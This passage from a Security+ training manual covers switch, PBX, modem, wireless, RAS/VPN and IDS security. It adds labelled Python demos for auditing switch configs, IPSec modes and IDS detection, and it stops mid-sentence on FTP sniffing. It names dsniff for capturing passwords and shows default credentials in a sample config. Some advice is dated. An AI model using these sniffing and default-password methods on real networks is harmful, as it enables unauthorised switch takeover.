  • Stateless routers cannot examine the content of a packet


Topic C: Switches
                         This topic covers the following CompTIA Security+ exam objective:

                          #      Objective

                          3.1    Understand security concerns and concepts of the following types of devices
                                  • Switches




                         Repeaters, hubs and switches
Explanation              Many network devices, including repeaters, hubs, bridges, and switches, have both
                         physical and logical configurations. Repeaters and hubs function at the Physical layer
                         and extend the Ethernet segment by recreating the transmission signals. Hubs are simply
                         multiport repeaters with all ports existing on the same collision domain.
                         Bridges function at layer 2 and filter and forward packets based on their MAC address.
                         They separate the network into two or more collision domains. Their function is based
                         on a table of MAC addresses and host location built from the moment they are turned
                         on. Switches also function at layer 2, but divide the network into multiple collision
                         domains, the number depending on the number of ports on the switch. Although bridges
                         and switches
                         divide collision domains, they forward broadcasts to all hosts on the layer 2 network. An
                         example of a switch is shown in Exhibit 9-3.




                         Exhibit 9-3: 3 Com® SuperStack® switch

                         Just as layer 2 switches made moving information within an intranet more efficient, a
                         new breed of switches now operates at layer 3, the Network layer, combining the speed
                         of hardware switching with the optimized path selection of layer 3.

                         Switch security
                         Modern switches offer a variety of security features including ACLs and Virtual Local
                         Area Networks (VLANs). The ACL-based packet filtering is similar to that mentioned
                         previously, so this discussion concentrates on VLANs. From a security perspective, the
                         major benefit of a switch over a hub is the separation of collision domains, limiting the
                         possibility of easy sniffing.

Virtual local area networks
The following is the Cisco definition of a virtual local area network (VLAN):

   A VLAN is defined as a broadcast domain within a switched network. Broadcast
   domains describe the extent that a network propagates a broadcast frame generated
   by a station. Some switches might be configured to support a single or multiple
   VLANs. Whenever a switch supports multiple VLANs, broadcasts within one VLAN
   never appear in another VLAN. Switch ports configured as a member of one VLAN
   belong to a different broadcast domain, as compared to switch ports configured as
   members of a different VLAN. (Overview of Routing Between Virtual LANs, Cisco
   Systems.)
VLANs increase security by clustering users in smaller groups, thereby making the job
of the hacker harder. Rather than just gaining access to the network, a hacker must now
gain access to a specific virtual LAN as well. In addition, by clustering users in a
VLAN, the possibility of a broadcast storm is reduced.

Security problems with switches
Switches, even with VLANs enabled, are still susceptible to being compromised.
Hackers can hijack a switch and reconfigure it to allow any traffic they wish through the
system.
Switch hijacking occurs when an unauthorized person is able to obtain administrator
privileges of a switch and modify its configuration. Once a switch has been
compromised, the hacker can do a variety of things, such as changing the administrator
password on the switch, turning off ports to critical systems, reconfiguring VLANs to
allow one or more systems to talk to systems they shouldn’t, or configuring the
switch to bypass the firewall altogether. There are two common ways to obtain
unauthorized access to a switch: trying default passwords, which might not have been
changed, and sniffing the network to get the administrator password via SNMP or
Telnet.
Almost all switches built today come with multiple accounts with default passwords,
and in some cases, no password at all. While most administrators know enough to
change the administrator password for the telnet and serial console accounts, sometimes
people don’t know to change the SNMP strings that provide remote access to the switch.
If the default SNMP strings are not changed or disabled, hackers might be able to obtain
a great deal of information about the network or even gain total control of the switch.
The Internet is full of sites that list the various switch types, their administrator
accounts, SNMP strings, and passwords.
If the default password(s) do not work, the switch can still be compromised if a hacker
is sniffing the network while an administrator is logging on to the switch. Contrary to
popular belief, it’s very possible to sniff the network on some switches. This
means that even if you change the administrator password(s) and the SNMP strings, you
might still be vulnerable to switch hijacking.
The easiest way to sniff a switched network is to use a software tool called “dsniff,”
which tricks the switch into sending packets destined to other systems to the sniffer.
Dsniff not only captures packets on switched networks, but also has the functionality to
automatically decode passwords from insecure protocols such as Telnet, HTTP, and
SNMP, which are commonly used to manage switches.

                    Securing a switch
                    Because gaining access to a switch is the first step in gaining control of it, all
                    management interfaces on switches should be isolated to reduce the chance of a
                    successful attack.
                    Many switches use Telnet or HTTP—both being open text protocols—for management.
                    It is recommended that any management of the switch be done by physical connection
                    to a serial port or through secure shell (SSH) or another encrypted method if available.
                    Separate switches or hubs should be used for DMZs to physically isolate them from the
                    rest of your network and prevent VLAN jumping.
                    It’s important to put a switch behind a dedicated firewall device. Ensure that you
                    maintain the switch, installing the latest version of the switch software and any security
                    patches to protect yourself against exploits such as the land.c attack. Read the product
                    documentation, paying special attention to administration accounts and default
                    passwords. Always set strong passwords on the switch.
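As an added example, not taken from the manual or from any vendor's documentation, the following Python script audits a switch configuration for the weaknesses this section lists: default SNMP strings left in place, Telnet and cleartext HTTP management, and a reversibly stored enable password. Both configurations are constructed here in Cisco IOS command syntax; the hostname, the placeholder secrets and the reference to access list 10 are assumptions, and the hardened version shows the settings the text recommends (SSH only, no default strings, strong secrets).

```python
import re
from typing import List

# Constructed IOS-style configuration of a switch left with factory-style management settings.
# It is not a real device's config; it reproduces the weaknesses the text describes.
WEAK_CONFIG = """\
hostname access-sw-1
enable password cisco
ip http server
snmp-server community public RO
snmp-server community private RW
line vty 0 4
 password cisco
 transport input telnet
line con 0
 password cisco
"""

# Constructed hardened version: SSH only for remote management, no cleartext HTTP,
# a non-default read-only SNMP community restricted by access list 10, and hashed secrets.
# The secret values are placeholders, and access list 10 is assumed to exist.
HARDENED_CONFIG = """\
hostname access-sw-1
service password-encryption
enable secret REPLACE-WITH-STRONG-SECRET
username admin secret REPLACE-WITH-STRONG-SECRET
no ip http server
ip http secure-server
snmp-server community REPLACE-WITH-RANDOM-STRING RO 10
ip ssh version 2
line vty 0 4
 login local
 transport input ssh
line con 0
 login local
"""

DEFAULT_COMMUNITIES = {"public", "private"}
SNMP_RE = re.compile(r"snmp-server community (\S+)(?:\s+(RO|RW))?")
TRANSPORT_RE = re.compile(r"\s+transport input (.+)")


def audit_switch_config(config: str) -> List[str]:
    """Return one finding per weak management setting found in an IOS-style config."""
    findings: List[str] = []
    section = ""  # most recent top-level command, so indented sub-commands know their context
    for raw in config.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if not line.startswith(" "):
            section = line
            m = SNMP_RE.match(line)
            if m:
                community, mode = m.group(1), m.group(2) or "RO"
                if community.lower() in DEFAULT_COMMUNITIES:
                    findings.append(f"default SNMP community '{community}' ({mode}) still configured")
                elif mode == "RW":
                    findings.append(f"read-write SNMP community '{community}' configured; prefer read-only")
            elif line == "ip http server":
                findings.append("cleartext HTTP management enabled")
            elif line.startswith("enable password "):
                findings.append("'enable password' stores a reversible secret; use 'enable secret'")
            continue
        # Indented sub-command: only the vty (remote login) lines matter for this audit.
        if section.startswith("line vty"):
            m = TRANSPORT_RE.match(line)
            if m and set(m.group(1).split()) & {"telnet", "all"}:
                findings.append(f"{section}: Telnet management permitted ('transport input {m.group(1)}')")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        results = audit_switch_config(cfg)
        print(f"{name}: {len(results)} finding(s)")
        for finding in results:
            print("  -", finding)
```

Run against the weak configuration the script reports five findings; the hardened configuration produces none. Extending the audit to a site's own checklist (for example, requiring `service password-encryption` or `ip ssh version 2` to be present) is a matter of adding rules to the top-level branch.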

Do it!              C-1:     Understanding switches
                      Questions and answers
                       1 What is the function of a switch?

                          It separates a common segment into two or more collision domains and forwards packets to
                          the correct domain based on the MAC address.

                       2 Modern switches can reduce broadcast traffic by forwarding packets based on the
                         IP address. True or false?

                          True

                       3 A feature available in some switches that permits separating the switch into
                         multiple broadcast domains is called ___________.

                          VLAN

                       4 What is switch hijacking?

                          This is an attack where an unauthorized person obtains administrator privileges of a switch
                          and modifies its configuration to allow any traffic through the network. The hacker can
                          change the switch’s administrator password, turn off ports to critical systems, reconfigure
                          VLANs, or configure the switch to bypass the firewall.


Topic D: Telecom, cable modem, and wireless devices
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.1   Understand security concerns and concepts of the following types of devices
                      • Wireless
                      • Modems
                      • Telecom / PBX (Private Branch Exchange)
                      • Mobile Devices




              PBX, DSL, cable modems and mobile devices
Explanation   Communications devices such as PBX, DSL, cable modems, and mobile devices require
              as much diligence when implementing security as the internal network. Your security
              policy should account for these often overlooked devices.

              Private branch exchange
              Private branch exchange (PBX) security is at heart very similar to traditional network
              security and is becoming increasingly so with the advent of IP-based telephony.
              An IP-based PBX is pictured in Exhibit 9-4.




              Exhibit 9-4: An IP-based PBX network

              A traditional PBX is a computer-based telephone switch that might be thought of as a
              small, in-house, telephone company. Failure to secure a PBX can result in toll fraud,
              theft of information, denial of service, and enhanced susceptibility to legal liability
              because of disclosure of supposedly secure information.
              As with traditional networks, the process of securing a PBX should be part of a written
              security policy. Determining who will be administering your PBX, who will be allowed
              what services, and what access to the PBX will be allowed, are all essential pieces of
              information.


                  Many PBX systems are remotely managed by the vendor who developed the system. If
                  a PBX is remotely managed, that means intrusion into the system can happen without
                  anyone actually gaining physical access to the PBX hardware. It is recommended that,
                  unless you are mandated to provide remote administration by the vendor, you remove
                  this feature and administer the PBX from a console directly connected to the system.
                  Additionally, many PBX systems are set up by default to allow handsets to be attached
                  and detached at will by simply plugging a phone into the network and pressing a code
                  on the keypad. This is done to ease maintenance, especially in those offices where
                  “hoteling” or job sharing is common. Although this does ease the ability to move
                  phones, it also opens a large security hole in the PBX system, because many of the
                  move codes are standardized and posted on the Internet.

                  Modems
                  The increasing availability of digital cable and digital subscriber line (DSL) has brought
                  some new security issues with it. Although this section is too limited to cover them
                  in depth, the discussion touches upon several of the more pressing issues. A typical
                  cable modem can be seen in Exhibit 9-5.




                  Exhibit 9-5: EtherFast® cable modem with USB and Ethernet Connection Model BEFCM U10


                  DSL versus cable modem security
                  In the past, DSL had a security edge over cable systems. This came about because of the
                  different methods by which the technologies connected their clients to the Internet.
                  DSL lines provide a direct connection between the computer or network connected on
                  the client side and the Internet. This direct connection is in contrast to the “party line”
                  nature of cable systems. Cable modems are connected to a shared segment, not unlike a
                  corporate LAN, which means that anyone else on that segment can potentially threaten
                  your system unless proper precautions are taken.
                  Although some cable customers encountered problems with the shared nature of the
                  network in the past, most cable service providers now mitigate this problem by building
                  security features into the cable modem hardware used to connect to their networks. In
                  particular, basic network firewall capabilities now prevent customer files from being
                  viewed or downloaded.

Most cable modems today also implement the Data Over Cable Service Interface
Specification (DOCSIS). DOCSIS includes support for cable network security features
including authentication and packet filtering.

Dynamic versus static IP addressing
Another major security concern that used to plague both DSL and cable modem users
was the issuing of static (permanent) IP addresses by the service providers. Now, most
service providers use Dynamic Host Configuration Protocol (DHCP) to issue dynamic,
random IP addresses to their clients. These are “leased” for a short period. Static
addresses provide a fixed target for potential hackers, so the move to DHCP is definitely
an improvement. Additional security can be provided by a firewall solution.

Wireless
Wireless devices, while providing greater flexibility, mobility, and overall convenience,
have their own vulnerabilities when it comes to security. While wireless network
connections utilize the same TCP/IP protocol that wired LANs use, the wireless nature
of the technology means that almost anyone can eavesdrop on a network
communication; even if your wireless access point is protected by your firewall, you are
still susceptible to having your unencrypted transmissions overheard. In addition,
without proper access control, anyone can connect to the network. The only secure
method of communicating with wireless technology is limiting access through MAC
address filtering and providing confidentiality with encryption.

Mobile devices
Mobile devices, specifically Personal Digital Assistants (PDAs), can open security holes
for any computer with which these devices communicate. A gap that is not covered by
antivirus software or firewalls occurs during the PDA to PC synchronization process.
View McAfee’s Web site to get more information about wireless security at
http://www.mcafee.com/myapps/vsw/default.asp. An example of a pocket
PC phone can be seen in Exhibit 9-6.




Exhibit 9-6: T-Mobile Pocket PC phone edition

Do it!              D-1:      Reviewing telecom, cable, and wireless security
                      Questions and answers
                       1 What are two standard features found in today’s cable modem hardware that
                         protect customer files from being viewed or downloaded?

                          Basic network firewall and Data Over Cable Service Interface Specification (DOCSIS)

                       2 Failure to secure a PBX can result in toll fraud, theft of information, denial of
                         service, and enhanced susceptibility to legal liability because of disclosure of
                         supposedly secure information. True or false?

                          True

                       3 Explain the vulnerability involved in allowing the vendor to remotely manage the
                         PBX system.

                          If a PBX is remotely managed, an intrusion into the system can happen without anyone
                          actually gaining physical access to the PBX hardware.

                       4 Explain why allowing handsets to be attached and detached at will within a PBX
                         system is considered risky.

                          Many of the move codes are standardized and posted on the Internet.

                       5 Why is DHCP considered more secure than static IP addressing?

                          Static IP addresses provide a fixed target for potential hackers; DHCP leases the IP address
                          for a short time.

                       6 DHCP provides enhanced security for a computer by:
                          A      Changing the MAC address of the computer on a random basis
                          B      Changing the IP address of the computer on a random basis
                          C      Tracking all keystrokes entered on the computer

                       7 What is the best method for ensuring confidentiality in wireless communications?
                          A      Firewall
                          B      Encryption
                          C      Authentication
                          D      Access control lists

                       8 How is it possible to spread a virus from a PDA?

                          The virus can be downloaded to a PC during sync operations.


Topic E: Securing remote access
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.1   Understand security concerns and concepts of the following types of devices
                      • RAS (Remote Access Server)
                      • VPN




              Remote access services
Explanation   Permitting employees to remotely access the corporate network requires careful
              consideration and planning. Two commonly used measures for ensuring authentication
              and confidentiality are RAS and VPN.
              The Remote Access Service (RAS) provides the ability for one computer to dial into
              another computer via a standard modem. Once connected and authenticated, the remote
              user has the same access as if connected using a wired network connection.
              RAS servers typically have an array of modems and dial-in lines for remote
              connections. In addition to accepting incoming calls, most RAS servers also offer a
              feature called callback, which allows the server to disconnect an incoming RAS call and
              dial the caller’s number to reconnect. If the caller is not at the designated number, then
              no RAS connection is made. Callback is the most secure method for using RAS, though
              it will only work for fixed phone numbers, such as those of telecommuting workers
              working from home.
              After users connect to the network through RAS, they have the same rights and
              privileges they have when they log on to a workstation that is physically wired to the
              network. RAS treats a modem as an extension of the network; RAS can use the same
              variety of protocols as a standard network interface card (NIC).
              RAS should be placed in the DMZ. It needs some protection, but generally should be
              considered insecure, and remote users should be forced to authenticate through an
              internal firewall prior to gaining full network access. One way to implement this is with
              a “lock and key” access method through the router. This is even available on low-end
              routers (such as Cisco 2600s).

              Security problems with RAS
              Because the RAS server is typically situated between the Internet and any physical
              firewall you might have in place, you should use a bastion host running only RAS and
              protected by application gateway software or firewall software. To further enhance
              security, use the
              encryption and mandatory callback features offered on RAS. In addition, if any
              unauthorized persons should gain access to the RAS server, they will still have to break
              through the firewall to get useful information.

                  Virtual private networks
                  A Virtual Private Network (VPN) is used to provide a secure communication pathway
                  or tunnel through such public networks as the Internet. An example of a typical VPN
                  can be seen in Exhibit 9-7.




                  Exhibit 9-7: A typical VPN using Point of Presence (POP)

                  When a virtual private network is implemented, the lowest levels of the TCP/IP protocol
                  are implemented using an existing TCP/IP connection. The VPN hardware or software
                  encrypts either the underlying data in a packet or the entire packet itself before
                  wrapping it in another IP packet for delivery. Even if the packet is intercepted along the
                  way, the content cannot be revealed to the hacker. Security is further enhanced by
                  implementing Internet Protocol Security (IPSec).

                  IPSec encryption
                  IPSec was initially developed for Internet Protocol version 6 (IPv6), but many current
                  IPv4 devices support it as well. It is the most commonly used encryption scheme for
                  VPN tunnels.
                  IPSec allows the encryption of either just the data in a packet or the packet as a whole
                  including the address header information. These are called transport and tunnel,
                  respectively.
                  With IPSec in place, a VPN can virtually eliminate packet sniffing and identity
                  spoofing. This is because only the sending and receiving computers hold the keys to
                  encrypt and decrypt the packets being sent across the public network. The following
                  steps show the process:
                      1 A remote user opens a VPN connection between his computer and his office
                          network. The office network and the user’s computer (or their respective VPN
                          gateways) execute a handshake and establish a secure connection by exchanging
                          private keys.
                      2 The user then makes a request for a particular file.
                      3 Assuming that the user has sufficient rights, the network begins to send the file
                          to the user by first breaking the file into packets.
                          • If the VPN is using transport encryption, then the packet’s data is encrypted
                            and the packets are sent on their way.
                          • If the system is using tunneling encryption, then each packet is encrypted and
                            placed inside another IP envelope with a new address arranged for by the
                            VPN gateways.
                      4 The packets are sent along the Internet until they are received at the user’s VPN
                          device, where the encryption is removed and the file is rebuilt. If the VPN is
                          using tunneling encryption, the peer VPN gateway forwards the unencrypted
                          packets to the appropriate host on its LAN.
                   Anyone sniffing the packets would have no idea of their content and might not even be
                   able to determine the source and destination of the request.
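The difference between transport and tunnel mode in steps 3 and 4, and what a sniffer on the public path can still read in each case, as an added Python example that is not part of the manual. The host and gateway addresses and the file request are constructed; the cipher is a toy HMAC-SHA256 counter keystream standing in for the AES used by real IPSec, and the key is a fixed constant rather than the product of the handshake in step 1, so only the "what is hidden" part of the process is modelled.

```python
import hashlib
import hmac
import socket
import struct
from dataclasses import dataclass
from typing import Tuple


@dataclass(frozen=True)
class IPPacket:
    """Simplified IP packet: the addresses a sniffer reads from the header, plus the payload."""
    src: str
    dst: str
    payload: bytes


# Constructed sample traffic (all values made up): a remote user's host requests a file from
# an office server; each site's VPN gateway sits on a public address.
REMOTE_HOST, OFFICE_SERVER = "10.1.1.10", "192.168.5.20"
REMOTE_GW, OFFICE_GW = "203.0.113.1", "198.51.100.1"
SAMPLE = IPPacket(REMOTE_HOST, OFFICE_SERVER, b"GET /reports/q3.xlsx")
KEY = hashlib.sha256(b"constructed demo key, not a negotiated IPSec key").digest()
NONCE = b"\x00" * 8


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Toy stand-in for ESP's cipher (AES in practice): an HMAC-SHA256 counter keystream
    XORed over the data. It exists only to show what is and is not hidden; the same call
    both encrypts and decrypts."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(key, nonce + struct.pack(">I", counter), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def transport_mode(pkt: IPPacket, key: bytes, nonce: bytes) -> IPPacket:
    """Transport mode: only the payload is encrypted; the original IP header stays in the clear."""
    return IPPacket(pkt.src, pkt.dst, keystream_xor(key, nonce, pkt.payload))


def tunnel_mode(pkt: IPPacket, key: bytes, nonce: bytes, gw_src: str, gw_dst: str) -> IPPacket:
    """Tunnel mode: the whole original packet (header and payload) is encrypted and placed
    inside a new IP envelope addressed between the two VPN gateways."""
    inner = socket.inet_aton(pkt.src) + socket.inet_aton(pkt.dst) + pkt.payload
    return IPPacket(gw_src, gw_dst, keystream_xor(key, nonce, inner))


def untunnel(pkt: IPPacket, key: bytes, nonce: bytes) -> IPPacket:
    """What the receiving gateway does in step 4: decrypt the envelope and recover the inner packet."""
    inner = keystream_xor(key, nonce, pkt.payload)
    return IPPacket(socket.inet_ntoa(inner[:4]), socket.inet_ntoa(inner[4:8]), inner[8:])


def exposed_addresses(pkt: IPPacket) -> Tuple[str, str]:
    """The only header fields someone capturing on the public path can read."""
    return pkt.src, pkt.dst


if __name__ == "__main__":
    t = transport_mode(SAMPLE, KEY, NONCE)
    u = tunnel_mode(SAMPLE, KEY, NONCE, REMOTE_GW, OFFICE_GW)
    print("transport mode, sniffer sees the real endpoints:", exposed_addresses(t))
    print("tunnel mode, sniffer sees only the gateways:   ", exposed_addresses(u))
    print("office gateway recovers:", untunnel(u, KEY, NONCE))
```

In transport mode the sniffer still learns which internal host is talking to which server, even though the request itself is unreadable; in tunnel mode the header it sees names only the two gateways, which is why the text says the source and destination of the request may not be determinable.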

Do it!   E-1:      Securing remote access devices
          Questions and answers
           1 Describe the callback feature offered by RAS.

              Callback allows the server to disconnect an incoming RAS call and dial the caller’s number
              to reconnect. If the caller is not at the designated number, then no RAS connection is made.

           2 RAS treats a modem as an extension of the network. True or false?

              True

           3 If the RAS is placed in the DMZ, remote users should be forced to authenticate
             through an internal firewall prior to gaining full network access. True or false?

              True

           4 Which encryption method is commonly used for VPN tunneling? (Choose all that
             apply.)
              A      Transport
              B      IPSec
              C      CHAP
              D      EAP


Topic F: Intrusion detection systems
                     This topic covers the following CompTIA Security+ exam objective:

                      #      Objective

                      3.1    Understand security concerns and concepts of the following types of devices
                              • IDS (Intrusion Detection System)
                              • Network Monitoring / Diagnostics




                     Host-based IDS
Explanation          Intrusion detection systems (IDS) offer the ability to analyze data in real time to detect,
                     log, and stop misuse or attacks as they occur. IDS solutions are available from a variety
                     of vendors including Computer Associates, Inc., Cisco Systems Inc., NFR Security,
                     SecureWorks, and many others. Systems come in the form of software called computer-
                     based IDS and dedicated hardware devices called network-based IDS.
                     Host-based IDS are often used to secure critical network servers or other systems
                     containing sensitive information. In a typical implementation, software applications
                     known as agents are loaded on each protected computer. These agents make use of the
                     disk space, RAM, and CPU time to analyze the operating system, applications, and
                     system audit trails. The collected information is compared to a set of rules to determine
                     if a security breach has occurred.
                     These agents are tailored to detect computer-related activity and can track these types of
                     events at an extremely fine level, even down to tracking which user accessed which file
                     at what time. Host-based agents can be self-contained, sending alarm information to the
                     screen attached to the computer upon which they are installed or they might be remotely
                     managed by a central software package that receives periodic updates and security data.
                     A computer-based solution that includes a centralized management platform makes it
                     easier to upgrade the software; however, these types of solutions do not scale well
                     across a large enterprise given the number of computers involved.

                     Network-based IDS
                     Network-based IDS monitor activity on a specific network segment. Unlike host-based
                     agents, network-based systems are usually dedicated platforms with two components: a
                     sensor, which passively analyzes network traffic, and a management system, which
                     allows security personnel to configure the sensors and provides alarms or feedback to
                     the administrator. Implementations vary with some vendors selling separate sensor and
                     management platforms and others selling self-contained sensor/management systems.
                     An example of a Cisco IDS can be seen in Exhibit 9-8.
                     The sensors in a network-based IDS capture network traffic in the monitored segment
                     and perform rule-based or expert system analysis of the traffic using configured
                     parameters. The sensors analyze packet headers to determine source and destination
                     addresses in the same manner as a router. In addition, the sensors examine the type of
                     data being transmitted and analyze the content of the packets flowing through them to
                     determine if the packet is legitimate.

                         If the sensor detects a packet that should not be in the system, it can perform a variety of
                         tasks including sending an alarm to the management software or communicating with a
                         router to have the router block all further packets from a particular address.




                         Exhibit 9-8: A Cisco network based IDS


                         Anomaly-based detection
                         Anomaly-based detection involves building statistical profiles of user activity and then
                         reacting to any activity that falls outside these profiles. A user’s profile can contain
Discuss how anomaly      attributes such as time spent logged on to the network, location of network access, files
detection systems are
much like some of
                         and servers accessed, and so forth.
today’s terrorist        One problem with anomaly-based detection is that users do not access their computers
investigators who have
been monitoring a
                         or the network in static, predictable ways; employees are transferred to other
group or an area for     departments, or they go on the road or work from home, changing their point of entry
quite some time and      into the network. Anomaly-based intrusion detection often leads to a large number of
are looking for any      false positives.
changes in standard
activity or behavior,
which might indicate     Signature-based detection
that something is
amiss                    Signature-based detection is very similar to an antivirus program in its method of
                         detecting potential attacks. It’s currently the more popular method of detection. Vendors
                         produce a list of “signatures” that the IDS use to compare against activity on the
                         network or host. When a match is found, the IDS take some action, such as logging the
                         event or sending an alarm to a management console. Although many vendors allow
                         users to configure existing signatures and create new ones, for the most part, customers
                         depend on vendors to provide the latest signatures to keep the IDS up to date with the
                         latest attacks. Signature-based detection can also produce false positives, as certain
                         normal network activity can be construed as malicious. For example, some network
                         applications or operating systems might send out numerous ICMP messages, which a
                         signature-based detection system might interpret as an attempt by an attacker to map out
                         a network segment.
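The two detection methods described above, as an added example written for these notes (it is not part of the CompTIA course material and not any vendor's IDS code): a small Python script that builds a statistical profile per user from a constructed baseline and flags deviations (anomaly-based), and separately applies fixed signature rules to the same events (signature-based). The baseline records, the user names alice, bob and netmon, the z-score threshold and the two signatures are all assumptions chosen to reproduce the false positives the text describes: the user who goes on the road trips the anomaly detector, and the monitoring host that legitimately sends many ICMP packets trips the signature.

```python
from statistics import mean, pstdev

# Constructed baseline of normal activity (made up for this example, not a
# real log). Each record is one logon with the attributes the text says a
# profile records: hour of day, point of entry, and ICMP packets per minute
# seen from that session. "netmon" is a monitoring host that legitimately
# sends many ICMP echo requests.
BASELINE = [
    {"user": "alice",  "hour": 9,  "location": "office", "icmp_pm": 2},
    {"user": "alice",  "hour": 8,  "location": "office", "icmp_pm": 1},
    {"user": "alice",  "hour": 10, "location": "office", "icmp_pm": 3},
    {"user": "alice",  "hour": 9,  "location": "office", "icmp_pm": 2},
    {"user": "bob",    "hour": 22, "location": "vpn",    "icmp_pm": 0},
    {"user": "bob",    "hour": 23, "location": "vpn",    "icmp_pm": 1},
    {"user": "bob",    "hour": 21, "location": "vpn",    "icmp_pm": 0},
    {"user": "bob",    "hour": 22, "location": "vpn",    "icmp_pm": 1},
    {"user": "netmon", "hour": 12, "location": "office", "icmp_pm": 70},
    {"user": "netmon", "hour": 12, "location": "office", "icmp_pm": 80},
    {"user": "netmon", "hour": 12, "location": "office", "icmp_pm": 75},
    {"user": "netmon", "hour": 12, "location": "office", "icmp_pm": 85},
]

# Constructed events to classify against the baseline.
NEW_EVENTS = [
    {"user": "alice",  "hour": 9,  "location": "office", "icmp_pm": 2},   # routine
    {"user": "alice",  "hour": 3,  "location": "home",   "icmp_pm": 1},   # on the road
    {"user": "bob",    "hour": 22, "location": "vpn",    "icmp_pm": 80},  # unusual for bob
    {"user": "netmon", "hour": 12, "location": "office", "icmp_pm": 80},  # normal for netmon
]


def build_profiles(records):
    """Anomaly-based: derive one statistical profile per user from the baseline."""
    by_user = {}
    for r in records:
        by_user.setdefault(r["user"], []).append(r)
    profiles = {}
    for user, rows in by_user.items():
        hours = [r["hour"] for r in rows]
        icmp = [r["icmp_pm"] for r in rows]
        profiles[user] = {
            "locations": {r["location"] for r in rows},
            "hour_mean": mean(hours),
            # Floor the spread at 1.0 so a perfectly regular user does not
            # generate an alert on every tiny deviation (assumed threshold).
            "hour_sd": max(pstdev(hours), 1.0),
            "icmp_mean": mean(icmp),
            "icmp_sd": max(pstdev(icmp), 1.0),
        }
    return profiles


def anomaly_alerts(profiles, events, z=3.0):
    """Flag events that fall outside the user's profile (z = standard deviations)."""
    alerts = []
    for e in events:
        p = profiles.get(e["user"])
        if p is None:
            alerts.append((e["user"], "no profile for user"))
            continue
        reasons = []
        if e["location"] not in p["locations"]:
            reasons.append("new location %s" % e["location"])
        if abs(e["hour"] - p["hour_mean"]) > z * p["hour_sd"]:
            reasons.append("unusual logon hour %d" % e["hour"])
        if e["icmp_pm"] - p["icmp_mean"] > z * p["icmp_sd"]:
            reasons.append("ICMP rate %d above profile" % e["icmp_pm"])
        if reasons:
            alerts.append((e["user"], "; ".join(reasons)))
    return alerts


# Signature-based: fixed rules that know nothing about individual users.
# Both thresholds are assumptions for the example.
SIGNATURES = [
    ("ICMP sweep", lambda e: e["icmp_pm"] >= 50),
    ("logon outside 07:00-19:00", lambda e: not 7 <= e["hour"] <= 19),
]


def signature_alerts(events, signatures=SIGNATURES):
    """Report every (user, signature) pair where a rule matches an event."""
    return [(e["user"], name) for e in events for name, rule in signatures if rule(e)]


if __name__ == "__main__":
    profiles = build_profiles(BASELINE)
    for alert in anomaly_alerts(profiles, NEW_EVENTS):
        print("anomaly  :", alert)
    for alert in signature_alerts(NEW_EVENTS):
        print("signature:", alert)
```

Running it shows the trade-off the text describes: the anomaly detector raises alerts on alice's logon from home and on bob's ICMP burst but stays quiet about netmon, because netmon's profile already contains a high ICMP rate; the signature rules raise the ICMP alert on netmon as well (a false positive) and flag bob's routine 22:00 logon, which his profile knows is normal.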

Do it!              F-1:      Discussing IDS
                      Questions and answers
                       1 IDS offer the ability to analyze data in real time to detect, log, and stop misuse or
                         attacks as they occur. True or false?

                          True

                       2 Compare the effectiveness of anomaly-based intrusion detection versus signature-
                         based detection.

                          Anomaly-based detection builds statistical profiles of user activities as a baseline for abuse.
                          Users do not access their computers or network in static, predictable ways. The resources
                          required for such a sensor are very large and costly; this method also leads to a large number
                          of false positives.

                          Signature-based detection relies on a vendor-produced list of signatures to compare against
                          activity on the network or host. This method can also produce a large number of false
                          positives.


Topic G: Network monitoring
              This topic covers the following CompTIA Security+ exam objectives:

               #     Objective

               2.5   Recognize and understand the administration of the following file transfer protocols and
                     concepts
                      • Vulnerabilities
                          • Packet Sniffing

               3.1   Understand security concerns and concepts of the following types of devices
                      • Network Monitoring / Diagnostics




              Network monitoring and diagnostics
Explanation   Network monitoring and diagnostics are essential steps in ensuring the safety and health
              of a network. Network monitoring is exactly what it sounds like, monitoring your
              network to ensure its reliability. Network monitoring and diagnostic tools can be either
              stand-alone or part of a network-monitoring platform such as HP’s OpenView, IBM’s
              Netview/AIX, Fidelia’s NetVigil, or Aprisma’s Spectrum.

              Microsoft Network Monitor
              Network Monitor is provided with Windows Server 2003 and offers basic network
              sniffing features, such as data collection, logging, fault analysis, and performance
              analysis. It’s a good learning tool, but it’s limited to sniffing packets from the local NIC.
              Microsoft also offers an enhanced version of Network Monitor that can operate in
              promiscuous mode and sniff packets from any computer on the network. This product
              should be used on a production network and is packaged along with Microsoft Systems
              Management Server.
              Network Monitor captures and displays a packet's source and destination address, the
              protocol used, and the data sent. If the data sent is encrypted, it is not readable in Network
              Monitor; that is, it is not displayed in plain text. By default, all data sent to a monitored NIC is
              captured by Network Monitor. If you want to reduce the scope of what data is
              collected, you can apply a filter. The full version of Network Monitor also includes
              the ability to identify Network Monitor users.

Do it!                         G-1:   Installing Microsoft Network Monitor
                                Here’s how                             Here’s why

Instructor note                 Students should have a Windows Server 2003 installation CD-ROM available for this
                                activity.

                                1 Boot to Server-X

                                2 Log on as Administrator              To install Network Monitor.

                                3 Click Start

                                  Choose Control Panel, Add
                                  or Remove Programs

                                4 Click Add/Remove
                                  Windows Components

Instructor note                 Make sure students don't check the check box.

                                5 Select Management and
                                  Monitoring Tools

                                  Click Details…

                                6 Check the Network Monitor            To configure Network Monitor to operate on the
                                  Tools box                            appropriate NIC.

                                  Click OK

                                7 Click Next

                                  Insert the Windows Server 2003,      (If prompted.)
                                  Standard Edition CD

                                  Click OK                             To continue the installation.

                                8 Click Finish                         To complete the installation.

                                9 Close the Add or Remove
                                  Programs window

                               10 Open a Command window

                                  Type ipconfig/all                    At the command prompt.

                                  Press Enter

                               11 Write down the MAC address of
                                  the network card that is connected
                                  to the classroom network

12 Click Start

   Choose Administrative              You’ll receive a message as shown below.
   Tools, Network Monitor




13 Click OK

14 Expand Local Computer

   Select the appropriate NIC (the    The screen will resemble the one shown below.
   MAC address you wrote in Step 9)




15 Click OK

   Close all windows

                         Using Microsoft Network Monitor to sniff an FTP session
Explanation              While Network Monitor is a very useful networking utility, it can also be used
                         maliciously. As discussed previously, FTP and Telnet send usernames and passwords in
                         clear text. Other protocols that send passwords and data in clear text include HTTP,
